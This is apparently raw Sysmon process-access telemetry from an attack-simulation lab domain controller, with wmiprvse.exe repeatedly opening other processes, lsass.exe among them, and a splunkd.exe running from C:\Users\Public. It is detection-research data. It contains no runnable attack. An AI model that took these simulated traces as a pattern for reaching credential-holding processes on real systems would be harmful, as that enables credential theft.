15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4C06-00000000A301}5212C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 